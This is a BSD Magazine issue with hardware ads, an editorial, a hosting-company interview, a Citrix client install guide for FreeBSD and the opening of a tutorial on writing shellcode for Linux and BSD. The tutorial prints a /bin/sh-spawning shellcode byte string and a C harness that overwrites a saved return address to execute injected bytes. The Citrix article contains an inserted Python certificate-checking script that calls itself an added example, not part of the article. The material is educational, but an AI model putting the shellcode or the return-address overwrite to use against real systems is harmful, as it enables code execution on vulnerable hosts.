Greenest, most energy-efficient blade server in the industry!

The new Triton TwinBlade Server is the most technologically advanced blade server system in the industry, and the ideal solution for power-efficiency, density, and ease of management.


The Triton TwinBlade Server supports up to 120 DP servers with 240 Intel® Xeon® 5600/5500 series processors per 42U rack, achieving an unmatched 0.35U per DP node. Up to two 4x QDR (40 Gbps) InfiniBand switches, 10GbE switches or pass-through modules give the TwinBlade the bandwidth to support the most demanding applications.

With N+1 redundant, high efficiency (94%) 2500W power supplies, the TwinBlade is the greenest, most energy-efficient blade server in the industry. The energy saved by the iX-Triton TwinBlade Server will keep the environment cleaner and greener, while leaving the green in your bank account.


Server management is also simple with the Triton TwinBlade Server. Remote access is available through SOL (Serial Over LAN), KVM, and KVM over IP technologies. A separate controller processor allows all of the Triton's remote management and monitoring to function regardless of system failures, offering true Lights Out Management.

Using the Triton's management system, administrators can remotely control TwinBlades, power supplies, cooling fans, and networking switches. Users may control the power remotely to reboot and reset the Triton TwinBlade Center and individual TwinBlades, and may also monitor temperatures, power status, fan speeds, and voltage.

For more information on the iX-Triton TwinBlade, or to request a quote, visit:

http://www.iXsystems.com/tritontwinblade


20 Server Compute Nodes in 7U of Rack Space

The iX-TB4X2 chassis holds 10 TwinBlade servers and each TwinBlade supports two nodes. This gives the iX-TB4X2 chassis the ability to house 20 nodes in 7U of rack space. The powerful Triton TwinBlade achieves 0.35U per dual-processor node, and is twice as dense as the previous generation of dual-processor blades.

A fully-loaded iX-Triton TwinBlade supports 40 Intel® Xeon® 5600/5500 series processors and up to 2.5 TB DDR 1333/1066/800MHz ECC Registered DIMM memory. In a 42U rack this translates into 120 nodes with 240 Intel® Xeon® 5600/5500 series processors and 15 TB DDR 1333/1066/800MHz ECC Registered DIMM memory.

» By replacing 1U servers with TwinBlade servers, the power savings of the iX-TB4X2 can reach more than $1000* per year, per server with reduced cooling costs added in.

» Replacing 1U rackmount servers with an iX-TB4X2 TwinBlade can reduce carbon dioxide emissions by over 5.5 metric tons.**

» The iX-Triton TwinBlade delivers the most energy-efficient blade server in the industry with four N+1 redundant, high efficiency (94%) 2500W power supplies.

* Electricity costs vary by location.

** According to the Energy Information Agency (a statistical agency of the U.S. Department of Energy), saving one kilowatt hour of electricity reduces carbon dioxide emissions by 1.43 pounds.





Call iXsystems toll free or visit our website today!
+1-800-820-BSDi | www.iXsystems.com

Intel, the Intel logo, and Xeon Inside are trademarks or registered trademarks of Intel Corporation in the U.S. and other countries.

• Up to 10 dual-node TwinBlades in a 7U chassis, 6 chassis per 42U rack
• Remotely manage and monitor TwinBlades, power supplies, cooling fans, and networking switches
• Hardware Health Monitor
• Virtual Media Over LAN (Virtual USB, Floppy/CD, and Drive Redirection)
• Integrated IPMI 2.0 w/ remote KVM over LAN/IP
• Remote Power Control
• Supports one hot-plug management module providing remote KVM and IPMI 2.0 functionalities
• Up to four N+1 redundant, hot-swap 2500W power supplies
• Up to 16 cooling fans

Each of the TwinBlade's two nodes features:

• Intel® Xeon® processor 5600/5500 series, with QPI up to 6.4 GT/s
• Intel® 5500 Chipset
• Up to 128GB DDR3 1333/1066/800MHz ECC Registered DIMM / 32GB Unbuffered
• Intel® 82576 Dual-Port Gigabit Ethernet
• 2x 2.5" Hot-Plug SATA Drive Trays
• Integrated Matrox G200eW Graphics
• Mellanox ConnectX QDR InfiniBand 40Gbps or 10GbE support (Optional)

Powerful. Intelligent.
Dear Readers!

The calendar is showing that autumn is here, but the weather still reminds us about the summer. Wherever you are and whatever you are doing - take a break and look into this issue.

It might seem a little bit different to you this time, let us know how you feel about it.

In this issue you will find the second part of Daniele's article: Network Monitoring with Nagios and OpenBSD.

Some of the articles will mention Linux this time, but don't worry - it is just to make clear the differences between these two OS.

You will find some information about Citrix and Festival in this issue and see some new authors contributing.

Don't forget about answering our surveys, they are really useful for us. And we are still looking for authors for the Russian version of BSD Magazine, please feel free to send us your feedback.

Thank you and enjoy reading!

Olga Kartseva
Editor in Chief
olga.kartseva@software.com.pl


Editor in Chief: Olga Kartseva olga.kartseva@software.com.pl
Contributing: Rob Somerville, Daniele Mazzocchio, Rashid N. Achilov, Joseba Mendez, Laura Michaels
Lukas Holt, Caryn Holt, Laura Michaels
Marko Milenovic, Worth Bishop and Mike Bybee
Art Director: Ireneusz Pogroszewski
Paweł Marciniak pawel@software.com.pl
National Sales Manager: Ewa Łozowicka ewa.lozowicka@software.com.pl
Karolina Lesińska karolina.lesinska@bsdmag.org
Advertising Sales: Olga Kartseva olga.kartseva@software.com.pl

Software Press Sp. z o.o. SK
ul. Bokserska 1, 02-682 Warszawa
Poland
worldwide publishing
tel: 1 917 338 36 31
www.bsdmag.org

Software Press Sp. z o.o. SK is looking for partners from all over the world. If you are interested in cooperation with us, please contact us via e-mail: editors@bsdmag.org

All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

The editors use an automatic DTP system.

Mathematical formulas created by Design Science MathType™.
Interview

06 Interview with Dirk H. Schulz
Geniodata — Creative Data Solutions and Hosting. An interview with Dirk H. Schulz, which will give you a closer look at this company.

GET STARTED

10 Installing a Citrix Client on FreeBSD
Andrew L. Gould
Citrix, like Samba with WinBind and Rdesktop, help us access services and applications that may be required for our jobs but may not be available for FreeBSD. These ports are important for FreeBSD Advocacy because they help us integrate FreeBSD into a Windows enterprise environment.
In this article, I will discuss the steps for installing the current, xen application version of the Citrix client on FreeBSD 7.3 and FreeBSD 8.1.

HOW TO'S

14 Writing shellcode for Linux and BSD
Daniele Mazzocchio
A shellcode is a sequence of machine language instructions which an already-running program can be forced to execute by altering its execution flow through software vulnerabilities (e.g. stack overflow, heap overflow or format strings).

How To Convert Text to Voice Using Festival and Lame in FreeBSD
Diego Montalvo
In the summer of 2010 I grew a bit bored of building search based apps so I decided to brush the dust off of the old Bob Chatter code base. After tons of code rewriting and little sleep, Bob Chatter version 1.0.0 IM|Chat for WebOS devices was released. Release 1.0.1 of Bob Chatter includes a service which converts real-time chat instances into voice files. After realizing first hand there was little documentation regarding FreeBSD and voice technology, I decided to write a tutorial where others could learn from.

FreeBSD Squid proxy with Parental Controls How-To
Rob Somerville
Traditionally, web pages were served via a webserver such as Apache and transmitted via the network on port 80 to a web-browser.
While pages and content were cached in the local browser cache, on larger networks it made sense to use a caching proxy such as Squid to reduce external traffic over the net for frequently fetched pages such as Google.

Network monitoring with Nagios and OpenBSD Part 2
Daniele Mazzocchio
One of Nagios' key features is its extensibility; new functionality can be easily added thanks to its plugin-based architecture, the external command interface and the Apache (http://httpd.apache.org/) web server. In this chapter, we will take a look at a few common issues that can be addressed with some of the most popular addons (http://www.nagiosexchange.org/) for Nagios.

LET'S TALK

The Difference Between FreeBSD and Ubuntu in a Not So Technical Way
Joshua Ebarvia
As a system administrator, I have been using various distributions of Linux and FreeBSD. I am comfortable in a mixed environment of *nix operating systems to provide network services. I will try to differentiate them and be as unbiased as possible so as not to start a flame war. I enjoy working with both systems and I like the way they are.
Interview with Dirk H. Schulz

genioDATA?

Why yet another hosting company?

Our first idea was not to offer hosting services. We needed an environment for engineering and testing — building complex systems at customers' sites means you have to do the engineering and testing somewhere else. And we were fed up with the typical test environment you puzzle up yourself — it had to be something professional, so we built up a production-like environment in one of the best data centers and defined processes and usage rules.

So you are not hosters from the beginning?

No. We are system managers. We engineer, implement and run IT systems at our customers' sites.

Again: Why hosting then?

That resulted from customer requests. When we told them of our engineering and testing data center, they wanted to place servers there and make use of certain services. The typical question was "Couldn't you also do ... for us there?"
But that still is far from what you now offer, isn't it?

To keep things under control then we had to do a lot of standardization and process definition. On one hand we had customers running systems in our data center who expected reliable performance, on the other hand we still needed our engineering environment. We had to look at our own projects with the same service and process view like at our customers' projects.

The answer was tough standardization and minute discipline. We ended up defining lots of products the two of us could use: the customers and ourselves.

What is the difference to mainstream hosting?

We offer hosting, knowledge and consulting in modularized packages. The customer solves on his own whatever he can solve and takes from us what he needs on top of that, be it technical items, support or plain knowledge. The customer alone defines the parts that make up his individual environment.

He can, let's say, simply rent a virtual FreeBSD server and manage it on his own, but he can also outsource part of the server's management to us or have us run a server farm completely. For administration on his own he can make use of community resources or use our offers of support and consulting, whatever suits him best.

That sounds great, but it still is not sufficient for uniqueness. Are there any USPs?

Of course. We offer the biggest range of hosted operating systems — nearly all UNIXes and UNIX families are within. Additionally we are front runners when it comes to deploying enterprise techniques in still-not-enterprise-environments. You can easily rent a virtual NetBSD server, but where do you find a virtual NetBSD server that is run highly available in a clustered environment? Where can you have a MacOS X Server run including layered backups for additional data security?

Enterprise environments are defined by prices that small and medium companies (SMCs) cannot pay, right?

No, there is no correlation there. In an enterprise environment the focus is on availability, in SMCs the focus is on getting it running somehow.

But SMCs depend on their IT the same way enterprises do, don't they?

Yes, they do. Email archives and digital file systems are more important today than analog files have been in previous decades. They just have to be available. Access times have to be much shorter nowadays. 'Always on' is needed.

What can you do to move the focus in SMCs to availability?

No need to do that, they already start realizing necessities. Legal authorities are quite modern in their requirements: emails have to be archived completely, searchably and with a thorough security concept,
otherwise penalties can be painful. Share holders and auditors demand revision proof document archives. Banks are evaluating their customers' IT strategies during rating processes (i.e. your credit costs depend on your IT setup). All that forces SMCs to refocus their IT concepts.

Can availability be bought? If yes: What has to be considered?

No, availability is not a question of money, but of discipline. You always have to go four steps:

• engineer a detailed concept,
• make a real world test of the concept before implementation,
• implement and run a comprehensive monitoring,
• do regular tests on every vital part.

If you leave out just one step, you risk losing the benefit of the others as well.

Can you name examples?

Yes. My favorite one is backups. It is not enough to make use of really good backup software, you always have to test restorability of your backed up data. Again and again we hear that customers can not restore their data in that one case of emergency — even with € 100.000 backup software. It is not sufficient to implement something that should work — you have to make sure it does work. And if you do that, you can also use € 0 software as long as it does what you need. By the way: it is good practice to spend money if you get your money's worth. Spending lots of money to make yourself feel you have done the right thing just costs. You have to test thoroughly and regularly. Or get someone to do it for you.

Operating Systems are the worlds in the IT universe. Get yours:
FreeBSD, NetBSD starting at € 25
CentOS, OpenSuSE starting at € 25
RHEL, SLES starting at € 42
MacOS X Server starting at € 67
Windows Server starting at € 42
Got an idea? Make it live. In a genioDATA Server.

How do you live up to this principle in your hosting offers?

For example there is lots of literature on what virtualization technique or product is the best — always comparing features. We could use that for decisions. Instead we test: 150 virtual servers with 5 operating systems in a 6 months test run on each of them: Xen, VMware, Parallels Server, etc. We know very well now what is reliable and what is not. And we continue testing with every new release because the IT world changes fast.

We rely on long term experience instead of well meant hopes.

Let's focus on money again: the four steps you named must be expensive for a small or medium company!

That depends on how much previous engineering can be reused. If we have to invent something completely new there are resources to commit, but we have manifold experience, we can reuse details from previous projects. That lessens the required resources in engineering and pre production testing (steps one and two). Monitoring can in most parts be covered with previous work.

Can you relate a success story to illustrate this?

Yes. We have designed a middleware farm on base of Tomcat servers for a customer lately. We would have had to evaluate Tomcat session clustering against clustering via upstream load balancers, but we had run specialized tests on this comparison in another project for another customer.

We only had to test if the customer's software runs in the resulting environment.

Of course our readers want to know what role BSD systems play in your projects!

That depends. The advantages of BSD systems — mainly stability and very effective usage of resources — are really interesting in the enterprise market, but widely unknown there. When we propose the usage of BSD systems to hosting customers, they are afraid of not being able to migrate them to their own premises when they need to.

But if the customer just rents a defined service matrix — let's say a tiered webserver farm with certain features — then we are free to use BSD systems and in some cases we do.

Our infrastructure systems (mail gateways, name servers and the like) are BSD based more and more.

What future do you see for BSD systems?

In a few years they will play a bigger role in the enterprise market than today. One important difference to Linux systems is their focus on a small set of necessities. Linux is multifarious and manifold, but that also leads to lots of possible errors. It is intense work to set up a slim, focused Linux system.

And then there is another phenomenon: The BSD developers claim to produce code of a better quality, and our long term tests seem to point in the same direction.

Now it is not only us who experience this. And word is spreading. This will have an impact on BSD in the enterprise market.

Meanwhile we strain to make BSD systems useable for small and medium companies.
Replicate your databases in high class data centers.

Have an email archive run by genioDATA that leaves nothing more to wish for.

Copy your files to several sites to plan for disaster recovery.

Got an idea? Make it live. In a genioDATA Server.

genioDATA
info@sccon.de

Need an ERP environment (enterprise resource planning)? Have to operate a web(services) cluster with 99,999 % availability? Need an email environment where not one email gets lost?

genioDATA engineers it. genioDATA runs it. You use it.

www.geniodata.com/bsdi.html  +49(0)8092 862568


GET STARTED

Installing a Citrix Client on FreeBSD

As our computing needs change, so does our criteria for selecting an operating system. Today, my job and my family are in different cities.

What you will learn...
• How to install Citrix on FreeBSD

What you should know...
• FreeBSD 8.1

I have a considerate boss who allows me to work from home on occasion. Since Citrix is my employer's chosen method for remote access, my first criteria for selecting an operating system for home use is its ability to run a Citrix client plugin.

Citrix, like Samba with WinBind and Rdesktop, help us access services and applications that may be required for our jobs but may not be available for FreeBSD. These ports are important for FreeBSD Advocacy because they help us integrate FreeBSD into a Windows enterprise environment.

In this article, I will discuss the steps for installing the current, xen application version of the Citrix client on FreeBSD 7.3 and FreeBSD 8.1.

Assumptions/requirements

• X Windows should be properly configured and running.
• Internet access should be properly configured.
• Linux emulation should be activated. (Add linux_enable="YES" to /etc/rc.conf and reboot.)
• You should have root access via su.
• Ports should be up-to-date. For FreeBSD 8.1, I used the ports that were included on the installation DVD. For FreeBSD 7.3, I updated ports using portsnap on August 19, 2010.
• The Citrix client requires a Mozilla based internet browser. I recommend Firefox 3.5 or Seamonkey because they also work with the Java plugin.

The topics above are covered adequately by the FreeBSD handbook, which can be found here:

http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/


Linux Base Port
You will need to install a linux_base port for Linux emulation. The Citrix client works with linux_base-fc4 and linux_base-f8, but does not work with linux_base-f10. Unfortunately, FreeBSD 8.1 and PC-BSD 8.1 use linux_base-f10 by default.

For FreeBSD 7.3 simply execute:

    pkg_add -r linux_base-fc4

For FreeBSD 8.1, perform the following:

    echo "OVERRIDE_LINUX_BASE_PORT=f8" >> /etc/make.conf
    echo "OVERRIDE_LINUX_NONBASE_PORTS=f8" >> /etc/make.conf
    pkg_add -r linux_base-f8

You will need to rebuild any linux applications you have installed previously.

PC-BSD 8.1 uses linux_base-f10 as a part of its base installation. Therefore, I do not recommend downgrading the linux_base port.


Installation

The port for the current Citrix client can be found at /usr/ports/net/citrix_xenapp. There is also an older client called citrix_ica; but Citrix does not keep links to old Citrix client files on its download web pages.

Using an internet browser

• Go to http://www.citrix.com/English/SS/downloads/details.asp?downloadID=3323. This will take you to the Linux download page for Citrix clients.
• Click on the Download button for the tar.gz file of Version 11.100.
• Save the file linuxx86-11.100.158406.tar.gz to your hard drive.

In a terminal, use the su command to become root and do the following:

• Change the current directory to the location where you saved the Citrix file.
• Change the name of the file to citrix_xenapp-linuxx86-11.100.158406.tar.gz.
• Copy the file to /usr/ports/distfiles/.
• Change the current directory to /usr/ports/net/citrix_xenapp/.
• Execute make install clean-depends.

FreeBSD will now install all of the dependencies required for citrix_xenapp. When it's done, it will run the installation/configuration script for the Citrix client. You will be asked the questions below. I have noted the answers I used.


Question 1
Select a setup option:

    1. Install Citrix Receiver for Linux 11.100
    2. Remove Citrix Receiver for Linux 11.100
    3. Quit Citrix Receiver for Linux 11.100 setup
    Enter option number 1-3 [1]:

Answer: 1

Question 2
Please enter the directory in which Citrix Receiver for Linux is to be installed.
[default /usr/local/ICAClient]
or type "quit" to abandon the installation:

Answer: I pressed enter to accept the default.

Question 3
You have chosen to install Citrix Receiver for Linux 11.100 in /usr/local/ICAClient.
Proceed with installation? [default n]:

Answer: y

Question 4
CITRIX(R) LICENSE AGREEMENT

Use of this component is subject to the Citrix license covering the Citrix product(s) with which you will be using this component. This component is only licensed for use with such Citrix product(s).
CTX code EP T A34320

Select an option:

    1. I accept
    2. I do not accept
    Enter option number 1-2 [2]:

Answer: 1

Question 5
Could not find a browser installation on your system.
Is a browser installed? [default n]:

Answer: y

Question 6
Integration complete.
No GNOME or KDE directories were found, skipping integration.
return: Illegal number: -1
Do you want to install USB support? [default n]:

Answer: n

Question 7
Select a setup option:

    1. Install Citrix Receiver for Linux 11.100
    2. Remove Citrix Receiver for Linux 11.100
    3. Quit Citrix Receiver for Linux 11.100 setup
    Enter option number 1-3 [2]:

Answer: 3


Figure 1. A window asking what to do with the file launch.ica (the Firefox "Opening launch.ica" dialog: "You have chosen to open launch.ica, which is a ICA file from: https://... What should Firefox do with this file?" with the choices Open with, Save File, and a checkbox "Do this automatically for files like this from now on")

Figure 2. To prevent repeating this step, check the box (the same dialog with "Open with wfica" selected and "Do this automatically for files like this from now on" checked)

Resources
http://people.freebsd.org/~tabthorpe/
http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/

Configuring Firefox
I chose Firefox 3.5 as my browser for using the Citrix client; but any Mozilla-based browser will suffice.

Open your browser using your normal, non-root user. From the menu, select Edit/Preferences. When the Preferences window opens, click on Content. If you have the Block pop-up windows option checked, click on the Exceptions button and add your company's Citrix server's website to the exceptions list. Then you can close the Preferences window.

In your browser, go to your Citrix server's website. At this point, I can only address matters as they occur with my employer's Citrix website. Your setup and experience may differ. Here's how it went for me:

1. I reached a login page, so I logged in.
2. I was taken to a page that stated that a Citrix client could not be detected. I was given options to download a client, state that a client was already installed, try again, or logoff. I selected the Already installed button.
3. The next page I saw was the Citrix menu page where I could select an application to run!

Once I selected an application, a window (see Figure 1) opened, asking me what to do with the file launch.ica.

Click on the Browse button and go to /usr/local/ICAClient/. Select the file wfica and click on the Open button. Then, so you don't have to repeat this step, check the box to Do this automatically for files like this from now on. This window should now look like Figure 2.

Once this has been done, you should be able to use the applications/services made available through the Citrix portal.

You may get a message that you have not chosen to trust the server's security certificate. The one I received is in Figure 3.

You have not chosen to trust "GlobalSign Root CA", the issuer of the server's security certificate (SSL error 61).

Figure 3. A message showing that you have not chosen to trust the server's security certificate

To fix this, download the certificate issuer's (GlobalSign Root CA in this case) root certificate and copy it to the directory:

    /usr/local/ICAClient/keystore/cacerts/

It is important to emphasize here that importing the certificates into your browser's keystore will not solve the problem. In fact, your browser may already have the certificates. The Citrix client does not use Firefox's certificate keystore.
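The keystore point is worth automating, because the ways it goes wrong are silent: a DER file instead of PEM, the server's own certificate instead of its issuer's root, or an HTML download page saved under a .pem name all sit in that directory without helping, and the client just keeps reporting SSL error 61. The following script is an added example, not code from the article or from Citrix. It uses only the Python standard library to check that a downloaded file is a PEM, self-signed, CA-flagged root, optionally pins its SHA-256 fingerprint (assumed to be obtained out of band, for instance from the CA's published value), and only then copies it into the directory the article names. demo() builds a constructed, throwaway root with the openssl command line in a temporary directory so that the accept and reject paths can be exercised without touching the real keystore.

```python
"""Vet a downloaded root certificate before copying it into the Citrix client's
own keystore. Added example, not code from the article; ICA_CACERTS is the
directory the article names, the expected fingerprint is assumed to come from
the CA's published value (out of band), and demo() uses the openssl command
line only to build a constructed, throwaway test root in a temp directory."""
import hashlib
import os
import shutil
import ssl
import subprocess
import tempfile

ICA_CACERTS = "/usr/local/ICAClient/keystore/cacerts/"  # directory from the article


def inspect_root(pem_path):
    """Describe the certificate in pem_path or raise ValueError.

    A file in that directory only helps if it is PEM, parses, carries the CA
    flag and is self-signed. get_ca_certs() lists only CA-flagged certs, so
    copying the server's leaf certificate by mistake is caught here."""
    with open(pem_path, "rb") as fh:
        raw = fh.read()
    header = b"-----BEGIN CERTIFICATE-----"
    if header not in raw:
        raise ValueError("not a PEM certificate (DER download or a saved HTML page?)")
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    try:
        ctx.load_verify_locations(cafile=pem_path)
    except ssl.SSLError as exc:
        raise ValueError(f"unparseable certificate: {exc}") from exc
    cas = ctx.get_ca_certs()
    if not cas:
        raise ValueError("certificate is not flagged as a CA (a server certificate?)")
    cert = cas[0]  # the article's case: one root per file
    if cert["subject"] != cert["issuer"]:
        raise ValueError("subject and issuer differ: an intermediate, not a root")
    pem = raw[raw.index(header):].decode("ascii").strip()
    der = ssl.PEM_cert_to_DER_cert(pem)
    return {
        "subject": dict(pair for rdn in cert["subject"] for pair in rdn),
        "sha256": hashlib.sha256(der).hexdigest(),
        "not_after": cert["notAfter"],
    }


def install_root(pem_path, keystore=ICA_CACERTS, expected_sha256=None):
    """Validate, optionally pin the SHA-256 fingerprint, then copy into keystore."""
    info = inspect_root(pem_path)
    if expected_sha256 is not None:
        want = expected_sha256.replace(":", "").lower()
        if info["sha256"] != want:
            raise ValueError(f"fingerprint {info['sha256']} != expected {want}")
    os.makedirs(keystore, exist_ok=True)
    dest = os.path.join(keystore, os.path.basename(pem_path))
    shutil.copyfile(pem_path, dest)
    os.chmod(dest, 0o644)  # readable by the non-root user who runs the client
    info["installed_as"] = dest
    return info


def demo():
    """Exercise the accept and reject paths against a constructed root in a temp dir."""
    tmp = tempfile.mkdtemp()
    store = os.path.join(tmp, "cacerts")  # stand-in for ICA_CACERTS
    root = os.path.join(tmp, "constructed-root.pem")
    subprocess.run(["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
                    "-keyout", os.path.join(tmp, "key.pem"), "-out", root,
                    "-subj", "/CN=Constructed Test Root", "-days", "1"],
                   check=True, capture_output=True)
    junk = os.path.join(tmp, "junk.pem")  # what a browser saves when the link is a web page
    with open(junk, "w") as fh:
        fh.write("<html>download page saved instead of the certificate</html>\n")
    results = {}
    good = install_root(root, store)
    results["accepted"] = good["subject"].get("commonName") == "Constructed Test Root"
    results["copied"] = os.path.isfile(good["installed_as"])
    for label, args in (("junk_rejected", (junk, store)),
                        ("pin_rejected", (root, store, "00" * 32))):
        try:
            install_root(*args)
            results[label] = False
        except ValueError:
            results[label] = True
    results["pin_accepted"] = install_root(root, store, good["sha256"])["sha256"] == good["sha256"]
    shutil.rmtree(tmp)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The browser check the article warns about is not repeated here on purpose: the script never looks at Firefox's store, only at the file it is given and the client's own directory, which is the only place the client reads.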

At this point I was able to open and use the applications that were available on the Citrix portal, and access files on my employer's network. I hope you meet with the same, happy success.

I would like to thank port maintainer Thomas Abthorpe for his work on the Citrix client ports, his patience and his help.

ANDREW L. GOULD
Writing shellcode for Linux and *BSD

A shellcode is a sequence of machine language instructions which an already-running program can be forced to execute by altering its execution flow through software vulnerabilities (e.g. stack overflow, heap overflow or format strings).

What you will learn...
• How to write a shellcode (verifying, examining etc.)

What you should know...
• Have some basic knowledge on OpenBSD and Linux

In other words, it is the notorious arbitrary code which can be run on systems affected by specific vulnerabilities. Typically, a shellcode looks like:

    char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                       "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                       "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

that is a sequence of binary bytes (machine language).

The purpose of this document is to introduce some of the most widespread techniques for writing shellcode for Linux and *BSD systems running on the IA-32 (x86) architecture.

You may wonder why you should learn anything about writing shellcode, since you can find a lot of ready-to-use shellcodes on the internet (after all, that's what copy and paste is for). Anyway, I think there are at least two good reasons:

• first of all, it's always a good idea to analyze someone else's shellcode before executing it, just to know what's going to happen and to avoid bad surprises (we will discuss this later (http://www.kernel-panic.it/security/shellcode/shellcode6.html) in detail);
• besides this, keep in mind that the shellcode may have to run in the most diverse environments (input filtering, string manipulation, IDS...) and, therefore, you should be able to modify it accordingly.





Listing 1. Syscalls are defined in the /usr/src/linux/include/asm-i386/unistd.h file, and each is paired with a number

    /* /usr/src/linux/include/asm-i386/unistd.h */
    #ifndef _ASM_I386_UNISTD_H_
    #define _ASM_I386_UNISTD_H_

    /*
     * This file contains the system call numbers.
     */

    #define __NR_exit                 1
    #define __NR_fork                 2
    #define __NR_read                 3
    #define __NR_write                4
    #define __NR_open                 5
    #define __NR_close                6
    #define __NR_waitpid              7
    #define __NR_creat                8
    [...]
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We would like to thank all of attendees for participating 
in the meetBSD 2010 Conference. 

We hope that meetBSD 2010 has allowed you to widen 
your knowledge, meet old and new friends who share 
common interests from BSD world. 


For those who weren't there 
— the meetBSD 2010 Conference video tracks, 
slides from all presentations and photos are now available! 


Check here: http://meetbsd.org/ | 
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HOW TO’S 


A good knowledge of IA-32 assembly programming 
is assumed, since we won't dwell much on strictly 
programming topics, such as the use of registers, 
memory addressing or calling conventions. 

Anyway, the appendix provides a short bibliography 
useful to anyone who wants to learn the basics of 
assembly programming or just to refresh one's memory. 
Last, a little knowledge of Linux, *BSD and C can be 
helpful... 


Linux system calls

Though shellcodes can do almost anything, they're usually aimed at spawning a (possibly privileged) shell on the target machine (that's where the name shellcode comes from...).

The easiest and fastest way to execute complex tasks in assembler is using system calls (or syscalls, as their friends call them). System calls constitute the interface between user mode and kernel mode; in other words, system calls are the means by which userland applications obtain system services from the kernel, such as managing the filesystem, starting new processes, accessing devices, etc.

Syscalls are defined in the /usr/src/linux/include/asm-i386/unistd.h file, and each is paired with a number: see Listing 1.

There are normally two ways to execute a syscall: 


• triggering the 0x80 software interrupt;
• using the libc wrapper functions.


The first method is much more portable, since it is 
based on system calls defined in the kernel code 
and, therefore, common to all Linux distributions. The 
second method, which uses the addresses of the 
C functions, instead, is hardly portable among different 
distributions, if not among different releases of the 
same distribution. 


int 0x80

Let's take a look at the first method. When the CPU receives a 0x80 interrupt, it enters kernel mode and executes the requested function, getting the appropriate handler through the Interrupt Descriptor Table.

The syscall number must be specified in EAX, which will eventually contain the return value. The function arguments (up to six), instead, are passed in the EBX, ECX, EDX, ESI, EDI and EBP registers (exactly in this order and using only the necessary registers). If the function requires more than six arguments, you need to put them in a structure and store the pointer to the first argument
Listing 2. The man page tells us that it requires only one parameter

$ man 2 _exit

_EXIT(2)                 Linux Programmer's Manual                 _EXIT(2)

NAME
       _exit, _Exit - terminate the current process

SYNOPSIS
       #include <unistd.h>

       void _exit(int status);


Listing 3. Opening the binary with gdb and disassembling it

$ gdb ./exit
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x804836a
(gdb) run
Starting program: /ramdisk/var/tmp/exit

Breakpoint 1, 0x0804836a in main ()
(gdb) disas main
Dump of assembler code for function main:
0x08048364 <main+0>:    push   %ebp
0x08048365 <main+1>:    mov    %esp,%ebp
0x08048367 <main+3>:    sub    $0x8,%esp
0x0804836a <main+6>:    and    $0xfffffff0,%esp
0x0804836d <main+9>:    mov    $0x0,%eax
0x08048372 <main+14>:   sub    %eax,%esp
0x08048374 <main+16>:   movl   $0x0,(%esp)
0x0804837b <main+23>:   call   0x8048284 <exit>
End of assembler dump.
(gdb)
in EBX. Note: Linux kernels prior to 2.4 didn't use the EBP register for passing arguments and, therefore, could pass only up to 5 arguments using registers.

After the syscall number and the parameters have been stored in the appropriate registers, the 0x80 interrupt is executed: the CPU enters kernel mode, executes the system call and returns the control to the user process.

To recap, to execute a system call, you need to:

• store the syscall number in EAX;
• store the syscall arguments in the appropriate registers, or:
  • create an in-memory structure containing the syscall parameters,
  • store in EBX a pointer to the first argument;
• execute the 0x80 software interrupt.

Now let's take a look at the most classic example: the _exit(2) syscall. We know from the /usr/src/linux/include/asm-i386/unistd.h file (see above) that it is number 1. The man page tells us that it requires only one parameter (status, see Listing 2), which we will store in the EBX register. Therefore, the instructions for executing this syscall are those of exit.asm:





Listing 4. Executing the system call

(gdb) disas exit
Dump of assembler code for function exit:
[...]
0x40052aed <exit+141>:  mov    0x8(%ebp),%eax
0x40052af0 <exit+144>:  mov    %eax,(%esp)
0x40052af3 <exit+147>:  call   0x400ced9c <_exit>
[...]
End of assembler dump.
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400ced9c <_exit+0>:   mov    0x4(%esp),%ebx
0x400ceda0 <_exit+4>:   mov    $0xfc,%eax
0x400ceda5 <_exit+9>:   int    $0x80
0x400ceda7 <_exit+11>:  mov    $0x1,%eax
0x400cedac <_exit+16>:  int    $0x80
0x400cedae <_exit+18>:  hlt
0x400cedaf <_exit+19>:  nop
End of assembler dump.
(gdb)


Listing 5. Here are the first lines of the file (/usr/src/sys/kern/syscalls.master) on OpenBSD

/usr/src/sys/kern/syscalls.master
[...]
1       STD             { void sys_exit(int rval); }
2       STD             { int sys_fork(void); }
3       STD             { ssize_t sys_read(int fd, void *buf, \
                            size_t nbyte); }
4       STD             { ssize_t sys_write(int fd, const void *buf, \
                            size_t nbyte); }
5       STD             { int sys_open(const char *path, \
                            int flags, ... mode_t mode); }
6       STD             { int sys_close(int fd); }
7       STD             { int sys_wait4(pid_t pid, int *status, int options, \
                            struct rusage *rusage); }
8       COMPAT_43       { int sys_creat(const char *path, mode_t mode); } ocreat

Listing 6. Getting the opcodes

$ nasm -f elf exit.asm
$ objdump -d exit.o

exit.o:     file format elf32-i386

Disassembly of section .text:

00000000 <.text>:
   0:   bb 00 00 00 00          mov    $0x0,%ebx
   5:   b8 01 00 00 00          mov    $0x1,%eax
   a:   cd 80                   int    $0x80
$
Listing 7. Testing the opcodes

sc_exit.c
char shellcode[] = "\xbb\x00\x00\x00\x00"
                   "\xb8\x01\x00\x00\x00"
                   "\xcd\x80";

int main()
{
    int *ret;

    ret = (int *)&ret + 2;          /* address of main()'s saved return address */
    (*ret) = (int)shellcode;        /* overwrite it with the shellcode address */
}
exit.asm
mov eax, 1      ; Number of the exit(2) syscall
mov ebx, 0      ; status
int 0x80        ; Interrupt 0x80


libc

As we've stated before, a system call can also be executed by means of a C function. So let's take a look at how to achieve the same results as above using a simple C program:





Listing 8. Verifying the shellcode

$ strace ./sc_exit
execve("./sc_exit", ["./sc_exit"], [/* ... */]) = 0
